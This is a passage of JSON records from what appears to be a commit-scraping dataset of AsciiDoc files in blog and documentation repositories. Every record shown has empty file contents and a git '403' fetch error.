'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4b64d560954f1c121f4dd7f0447f57de2432f8de","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/08\/13\/deref.adoc","new_file":"content\/news\/2021\/08\/13\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"31bc134d26161e6952213a5ff22ff27834ca1ae9","subject":"Renamed '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc' to '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-makers.adoc'","message":"Renamed '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc' to '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-makers.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-makers.adoc","new_file":"_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-makers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e2ff79780505a09b4e87c39c8f0fbfaa6e15589","subject":"Mv Coffee","message":"Mv Coffee\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"923fea57bd582df214caaf93757315ba38c9f58e","subject":"Update 2015-03-27-Chat.adoc","message":"Update 2015-03-27-Chat.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-Chat.adoc","new_file":"_posts\/2015-03-27-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84338d235d0a31e27c3a1e84ed9e84533b1ebacd","subject":"Update 2015-09-16-guat.adoc","message":"Update 2015-09-16-guat.adoc","repos":"maorodriguez\/maorodriguez.github.io,maorodriguez\/maorodriguez.github.io,maorodriguez\/maorodriguez.github.io","old_file":"_posts\/2015-09-16-guat.adoc","new_file":"_posts\/2015-09-16-guat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/maorodriguez\/maorodriguez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1fa7f3167d213f3d6e926864168afe30e3fea31","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e53bb5ddcc720b44706dc1a18ba0f851cb2ad04","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49205046013ef81bc183df01db705affb98350d9","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-cloudfoundry,spring-cloud\/spring-cloud-cloudfoundry","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-cloudfoundry.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccd6fc4c7961e8396ab249b45b3fa950de9dbc72","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2573287923109ece30de5c9ec0cc0d29653f6ea5","subject":"Update 2016-11-14.adoc","message":"Update 2016-11-14.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"_posts\/2016-11-14.adoc","new_file":"_posts\/2016-11-14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d85f5e8e7e2d51f7945b161e0fc90bca2416729f","subject":"Symlink for Github.","message":"Symlink for Github.\n","repos":"Yubico\/u2fval-client-php","old_file":"examples\/README.adoc","new_file":"examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/u2fval-client-php.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dd923ce7b70f692ab9291df4a5f823e098e7609d","subject":"Update 2016-05-23-Blog-title.adoc","message":"Update 2016-05-23-Blog-title.adoc","repos":"parkowski\/parkowski.github.io,parkowski\/parkowski.github.io,parkowski\/parkowski.github.io,parkowski\/parkowski.github.io","old_file":"_posts\/2016-05-23-Blog-title.adoc","new_file":"_posts\/2016-05-23-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/parkowski\/parkowski.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b1374b7f62fcaac8e5603946d3a5c4dc0f031f1","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Task Scheduler Keys.asciidoc","new_file":"documentation\/Task Scheduler Keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d511d8724922dfcac020904169161d3ac385d972","subject":"Added Batch Config eip base docs","message":"Added Batch Config eip base docs\n","repos":"objectiser\/camel,akhettar\/camel,rmarting\/camel,Fabryprog\/camel,akhettar\/camel,kevinearls\/camel,jamesnetherton\/camel,curso007\/camel,isavin\/camel,snurmine\/camel,alvinkwekel\/camel,pmoerenhout\/camel,alvinkwekel\/camel,curso007\/camel,snurmine\/camel,tdiesler\/camel,kevinearls\/camel,mcollovati\/camel,tadayosi\/camel,onders86\/camel,zregvart\/camel,gautric\/camel,sverkera\/camel,jonmcewen\/camel,gautric\/camel,onders86\/camel,punkhorn\/camel-upstream,snurmine\/camel,sverkera\/camel,CodeSmell\/camel,tadayosi\/camel,onders86\/camel,anoordover\/camel,snurmine\/camel,nicolaferraro\/camel,christophd\/camel,CodeSmell\/camel,kevinearls\/camel,ullgren\/camel,pmoerenhout\/camel,snurmine\/camel,apache\/camel,jamesnetherton\/camel,tdiesler\/camel,snurmine\/camel,anoordover\/camel,objectiser\/camel,jonmcewen\/camel,isavin\/camel,jamesnetherton\/camel,apache\/camel,curso007\/camel,sverkera\/camel,jonmcewen\/camel,nicolaferraro\/camel,tadayosi\/camel,akhettar\/camel,pax95\/camel,gautric\/camel,ullgren\/camel,CodeSmell\/camel,adessaigne\/camel,DariusX\/camel,zregvart\/camel,rmarting\/camel,tdiesler\/camel,dmvolod\/camel,gnodet\/camel,pax95\/camel,adessaigne\/camel,punkhorn\/camel-upstream,gnodet\/camel,CodeSmell\/camel,mcollovati\/camel,nikhilvibhav\/camel,isavin\/camel,pax95\/camel,tadayosi\/camel,davidkarlsen\/camel,tdiesler\/camel,anoordover\/camel,kevinearls\/camel,pax95\/camel,christophd\/camel,dmvolod\/camel,dmvolod\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,christophd\/camel,jonmcewen\/camel,cunningt\/camel,pmoerenhout\/camel,gautric\/camel,nikhilvibhav\/camel,akhettar\/camel,adessaigne\/camel,nicolaferraro\/camel,tadayosi\/camel,tdiesler\/camel,alvinkwekel\/camel,rmarting\/camel,rmarting\/camel,Fabryprog\/camel,gautric\/camel,dmvolod\/camel,davidkarlsen\/camel,ullgren\/camel,gnodet\/camel,adessaigne\/camel,isavin\/camel,mcollovati\/camel,christophd\/camel,alvinkwekel\/camel,objectiser\/camel,cunningt\/camel,rmarting\/camel,anoordover\/camel,dmvolod\/camel,apache\/camel,christophd\/camel,onders86\/camel,jonmcewen\/camel,mcollovati\/camel,curso007\/camel,gnodet\/camel,dmvolod\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,nikhilvibhav\/camel,anoordover\/camel,isavin\/camel,kevinearls\/camel,rmarting\/camel,ullgren\/camel,punkhorn\/camel-upstream,cunningt\/camel,pax95\/camel,Fabryprog\/camel,zregvart\/camel,cunningt\/camel,jonmcewen\/camel,anoordover\/camel,akhettar\/camel,jamesnetherton\/camel,pmoerenhout\/camel,akhettar\/camel,jamesnetherton\/camel,gnodet\/camel,nicolaferraro\/camel,zregvart\/camel,apache\/camel,christophd\/camel,DariusX\/camel,punkhorn\/camel-upstream,gautric\/camel,cunningt\/camel,objectiser\/camel,jamesnetherton\/camel,cunningt\/camel,curso007\/camel,davidkarlsen\/camel,sverkera\/camel,pax95\/camel,davidkarlsen\/camel,onders86\/camel,isavin\/camel,sverkera\/camel,Fabryprog\/camel,apache\/camel,pmoerenhout\/camel,adessaigne\/camel,onders86\/camel,DariusX\/camel,curso007\/camel,tdiesler\/camel,kevinearls\/camel,DariusX\/camel,sverkera\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/batch-config-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/batch-config-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fdf2b77c65cd18fa794cd7232e2ff71c3e0ea48","subject":"Update 2015-06-22-Documenter.adoc","message":"Update 2015-06-22-Documenter.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-22-Documenter.adoc","new_file":"_posts\/2015-06-22-Documenter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53f703fc3b83197f78043a8a79d5bda3e0ca2127","subject":"Update 2015-10-22-First-post.adoc","message":"Update 2015-10-22-First-post.adoc","repos":"csiebler\/hubpress-test,csiebler\/hubpress-test,csiebler\/hubpress-test","old_file":"_posts\/2015-10-22-First-post.adoc","new_file":"_posts\/2015-10-22-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csiebler\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a78b9f87bceb2dbf9dca0ac80d81e76f63ecbfc6","subject":"Update 2016-07-25-2016-07-25.adoc","message":"Update 2016-07-25-2016-07-25.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-25-2016-07-25.adoc","new_file":"_posts\/2016-07-25-2016-07-25.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"daef4599da91989a3a3a5b6727efad368a80a823","subject":"Updated README with end of life documentation","message":"Updated README with end of life documentation\n\nNecessary to close this project down in favor of using Pennyworth\ninstead.\n","repos":"bkuhlmann\/alfred","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/alfred.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02cd3e3d6dbdb38674e696e2b091210007e59783","subject":"y2b create post Beats By Dr. Dre Beats Pro Detox Edition Unboxing (HD)","message":"y2b create post Beats By Dr. Dre Beats Pro Detox Edition Unboxing (HD)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-26-Beats-By-Dr-Dre-Beats-Pro-Detox-Edition-Unboxing-HD.adoc","new_file":"_posts\/2011-06-26-Beats-By-Dr-Dre-Beats-Pro-Detox-Edition-Unboxing-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0b9f47c8199cc4e61a78b58589a0edee206d485","subject":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","message":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3bf9fb32d15458776caca242105bac46d2ceea4","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d1cb50c7f7c3f01bcba6e77b544daea546b2bb5","subject":"Update 2017-01-31-Hello-everyone.adoc","message":"Update 2017-01-31-Hello-everyone.adoc","repos":"Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io","old_file":"_posts\/2017-01-31-Hello-everyone.adoc","new_file":"_posts\/2017-01-31-Hello-everyone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Adyrhan\/adyrhan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99a41b0f480be5aafc2bb2d4a3df58c78a02501f","subject":"Update 2017-05-08-Held-und-Genie.adoc","message":"Update 2017-05-08-Held-und-Genie.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-08-Held-und-Genie.adoc","new_file":"_posts\/2017-05-08-Held-und-Genie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8433a3b2e9cbdcf8ae884b93e3504af23cb5e6c0","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d603b46b6a3ff55be49d5a86a85e4f43952d2691","subject":"Fixed a typo","message":"Fixed a typo\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/readme.adoc","new_file":"developer-tools\/java\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09c8017a657e4ac52700ff0fa6a399d2c5b9984c","subject":"Changed Saxon version number in documentation to 10.3","message":"Changed Saxon version number in documentation to 10.3\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"36d3f69ec8044b7c9910b2ae06303785e230c467","subject":"Update 2016-03-24-Microservices-in-the-Chronicle-world-Part-2.adoc","message":"Update 2016-03-24-Microservices-in-the-Chronicle-world-Part-2.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-24-Microservices-in-the-Chronicle-world-Part-2.adoc","new_file":"_posts\/2016-03-24-Microservices-in-the-Chronicle-world-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c2d257c6624ed18d82601e9e2f5aa4588e97f62","subject":"doc: user-guide: clarify scheduler operation for atomic queues","message":"doc: user-guide: clarify scheduler operation for atomic queues\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\n","repos":"dkrot\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,erachmi\/odp,ravineet-singh\/odp,erachmi\/odp,mike-holmes-linaro\/odp,nmorey\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,dkrot\/odp,nmorey\/odp,mike-holmes-linaro\/odp,nmorey\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b6afc8fc4462dfe256429b17bd86e106d503d96d","subject":"Spell check using F6 with ST2","message":"Spell check using F6 with ST2\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"259f5efd296cae76e9c18fecace04f0e640b96ed","subject":"Update 2015-09-23-Daisies-arent-roses.adoc","message":"Update 2015-09-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbfdd2e3caeef2a16f44c4d4f923a40d62cfb71b","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95785c257868fecbf5466af4364373004441edec","subject":"added README","message":"added README\n","repos":"bsx\/weechat-silc","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bsx\/weechat-silc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de440a23163d776b9e9199778ad62276dc99530f","subject":"textfield and validation doc","message":"textfield and validation doc","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"doc\/textfield_and_validation.adoc","new_file":"doc\/textfield_and_validation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cda18c166823150a1aa5c8b93b695ecb2e9f917","subject":"create post Using Your Wrist To Power Your Smartphone...","message":"create post Using Your Wrist To Power Your Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Using-Your-Wrist-To-Power-Your-Smartphone....adoc","new_file":"_posts\/2018-02-26-Using-Your-Wrist-To-Power-Your-Smartphone....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"343e4e23a4b50c6a137c5ffe4937737cc480e0b7","subject":"add frequently used docs","message":"add frequently used docs\n","repos":"gengjiawen\/AndroidHelper,gengjiawen\/AndroidHelper","old_file":"docs\/fix65kMethod.adoc","new_file":"docs\/fix65kMethod.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gengjiawen\/AndroidHelper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f28e0fbeeccb0d147f66d3e89480cd0252ae217a","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea8a278303625b3284c2b56d57e0b8ac25fe6f01","subject":"Create test.adoc","message":"Create test.adoc","repos":"JR0ch17\/S3Cruze","old_file":"test.adoc","new_file":"test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JR0ch17\/S3Cruze.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47194473150bfbc2a85b3bf73c7e0155b6294cc7","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b6de8dba9904367c295622b639cac7c4b40b025","subject":"Update 2016-05-02-Lonely-road.adoc","message":"Update 2016-05-02-Lonely-road.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-02-Lonely-road.adoc","new_file":"_posts\/2016-05-02-Lonely-road.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb8232b307c9cda18597043ad4b6be37ca7b7ba6","subject":"Deleted _posts\/2016-12-03-Hello-World.adoc","message":"Deleted _posts\/2016-12-03-Hello-World.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-03-Hello-World.adoc","new_file":"_posts\/2016-12-03-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b95884255f06d53c72515bc4e442d47fc8e0323","subject":"Update 2018-06-30-empty-space.adoc","message":"Update 2018-06-30-empty-space.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-06-30-empty-space.adoc","new_file":"_posts\/2018-06-30-empty-space.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d13ac79a46602b135cb7dffcf484c65ccb898099","subject":"docs: updates to kudu_impala_integration.adoc","message":"docs: updates to kudu_impala_integration.adoc\n\nNote that this doc has diverged pretty substantially from its downstream\nCloudera counterpart, which is far more featureful.\n\nChange-Id: I02a91f1c33be3f0d6fbffaef5e03832e21b6db70\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4138\nTested-by: Kudu Jenkins\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Dan Burkert 